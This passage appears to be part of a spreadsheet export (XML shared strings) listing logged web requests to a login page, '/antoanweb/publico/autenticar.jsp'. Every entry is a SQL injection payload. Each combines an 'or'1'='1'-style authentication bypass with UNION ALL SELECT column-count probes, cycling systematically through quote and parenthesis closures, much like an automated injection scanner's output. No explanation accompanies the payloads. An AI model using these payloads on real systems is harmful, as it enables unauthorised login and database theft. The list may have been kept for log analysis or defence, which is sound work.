    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8964,8964,8964,8964,8964,8964,8964,8964,8964,8964,8964,8964,8964,8964#and(('twwo'like'twwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398,2398#and(('jkdh'like'jkdh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290,9290#and(('nkjw'like'nkjw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720,5720#and(('mgmh'like'mgmh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159,2159#and(('umrq'like'umrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199,2199#and(('otan'like'otan</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110,7110#and(('lhiw'like'lhiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4689,4689,4689,4689,4689,4689,4689,4689,4689,4689,4689#and((('pnep'like'pnep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3913,3913,3913,3913,3913,3913,3913,3913,3913,3913,3913,3913#and((('sgcg'like'sgcg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5436,5436,5436,5436,5436,5436,5436,5436,5436,5436,5436,5436,5436#and((('ethv'like'ethv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050#and((('knzi'like'knzi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7523,7523,7523,7523,7523,7523,7523,7523,7523,7523,7523,7523,7523,7523,7523#and((('kfdb'like'kfdb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853,9853#and((('hmyd'like'hmyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417,2417#and((('xlvr'like'xlvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723#and((('cfjh'like'cfjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841,9841#and((('pxyl'like'pxyl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089#and((('eryn'like'eryn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141#and'qbuj'like'qbuj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5905,5905,5905,5905,5905,5905,5905,5905,5905,5905,5905,5905#and'aswm'like'aswm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047,8047#and'qpop'like'qpop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3179,3179,3179,3179,3179,3179,3179,3179,3179,3179,3179,3179,3179,3179#and'ahiz'like'ahiz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6165,6165,6165,6165,6165,6165,6165,6165,6165,6165,6165,6165,6165,6165,6165#and'oqrz'like'oqrz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556#and'nyfk'like'nyfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867#and'nuvf'like'nuvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411,8411#and'jomz'like'jomz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489,8489#and'suuo'like'suuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498,3498#and'awtn'like'awtn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045#and("marm"="marm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1812,1812,1812,1812,1812,1812,1812,1812,1812,1812,1812,1812#and("ugxv"="ugxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7520,7520,7520,7520,7520,7520,7520,7520,7520,7520,7520,7520,7520#and("yiyf"="yiyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2684,2684,2684,2684,2684,2684,2684,2684,2684,2684,2684,2684,2684,2684#and("clif"="clif</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332#and("xhqj"="xhqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258,2258#and("hjfd"="hjfd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091,7091#and("dqfx"="dqfx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720,7720#and("fool"="fool</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018,1018#and("ciel"="ciel</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436,3436#and("dqfa"="dqfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9944,9944,9944,9944,9944,9944,9944,9944,9944,9944,9944#and(("idwk"="idwk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4505,4505,4505,4505,4505,4505,4505,4505,4505,4505,4505,4505#and(("zqjp"="zqjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687#and(("impl"="impl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736,6736#and(("xvwy"="xvwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7842,7842,7842,7842,7842,7842,7842,7842,7842,7842,7842,7842,7842,7842,7842#and(("vghf"="vghf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109,3109#and(("pevh"="pevh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218,5218#and(("pixw"="pixw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076,8076#and(("rqcw"="rqcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114,1114#and(("hrfa"="hrfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645,3645#and(("vnzx"="vnzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6193,6193,6193,6193,6193,6193,6193,6193,6193,6193,6193#and((("qwns"="qwns</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6928,6928,6928,6928,6928,6928,6928,6928,6928,6928,6928,6928#and((("qnft"="qnft</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045#and((("nxsh"="nxsh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4553,4553,4553,4553,4553,4553,4553,4553,4553,4553,4553,4553,4553,4553#and((("bgjv"="bgjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6498,6498,6498,6498,6498,6498,6498,6498,6498,6498,6498,6498,6498,6498,6498#and((("irev"="irev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236#and((("fvij"="fvij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225,7225#and((("vbci"="vbci</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804,4804#and((("qhff"="qhff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100,8100#and((("xxuz"="xxuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461,1461#and((("pxdr"="pxdr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6940,6940,6940,6940,6940,6940,6940,6940,6940,6940,6940#and"nppd"="nppd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438#and"imqf"="imqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5551,5551,5551,5551,5551,5551,5551,5551,5551,5551,5551,5551,5551#and"vced"="vced</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048,3048#and"hrzw"="hrzw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7021,7021,7021,7021,7021,7021,7021,7021,7021,7021,7021,7021,7021,7021,7021#and"ixue"="ixue</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988,1988#and"tppn"="tppn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226,1226#and"zwxk"="zwxk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302,5302#and"snco"="snco</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453,1453#and"crea"="crea</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421,8421#and"owff"="owff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6833,6833,6833,6833,6833,6833,6833,6833,6833,6833,6833#and("fevy"like"fevy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7190,7190,7190,7190,7190,7190,7190,7190,7190,7190,7190,7190#and("yjbd"like"yjbd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5965,5965,5965,5965,5965,5965,5965,5965,5965,5965,5965,5965,5965#and("lbcb"like"lbcb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312,3312#and("tutq"like"tutq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614#and("ifoq"like"ifoq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649,5649#and("isqo"like"isqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086,5086#and("wwmy"like"wwmy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect390,390,390,390,390,390,390,390,390,390,390,390,390,390,390,390,390,390#and("ekbq"like"ekbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552,1552#and("xzlf"like"xzlf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165,8165#and("sezk"like"sezk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7944,7944,7944,7944,7944,7944,7944,7944,7944,7944,7944#and(("iqax"like"iqax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1648,1648,1648,1648,1648,1648,1648,1648,1648,1648,1648,1648#and(("goku"like"goku</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368#and(("cazy"like"cazy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672#and(("lbhm"like"lbhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#and(("qwkn"like"qwkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965,8965#and(("piyp"like"piyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653,6653#and(("pjwl"like"pjwl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460,8460#and(("eebk"like"eebk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835,1835#and(("dalt"like"dalt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602,6602#and(("olfk"like"olfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126#and((("fohe"like"fohe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7222,7222,7222,7222,7222,7222,7222,7222,7222,7222,7222,7222#and((("qlfu"like"qlfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2524,2524,2524,2524,2524,2524,2524,2524,2524,2524,2524,2524,2524#and((("fqkq"like"fqkq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3460,3460,3460,3460,3460,3460,3460,3460,3460,3460,3460,3460,3460,3460#and((("dxcj"like"dxcj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6070,6070,6070,6070,6070,6070,6070,6070,6070,6070,6070,6070,6070,6070,6070#and((("bpjj"like"bpjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231,6231#and((("iqen"like"iqen</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856,4856#and((("ltcs"like"ltcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180#and((("pkmk"like"pkmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588,3588#and((("olqh"like"olqh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332,1332#and((("daib"like"daib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7365,7365,7365,7365,7365,7365,7365,7365,7365,7365,7365#and"qqgb"like"qqgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1432,1432,1432,1432,1432,1432,1432,1432,1432,1432,1432,1432#and"hcii"like"hcii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8698,8698,8698,8698,8698,8698,8698,8698,8698,8698,8698,8698,8698#and"tudl"like"tudl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262,2262#and"uwru"like"uwru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5415,5415,5415,5415,5415,5415,5415,5415,5415,5415,5415,5415,5415,5415,5415#and"omze"like"omze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122#and"vdga"like"vdga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615,9615#and"eise"like"eise</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158#and"otkn"like"otkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232,1232#and"jtam"like"jtam</t>
  </si>
  <si>
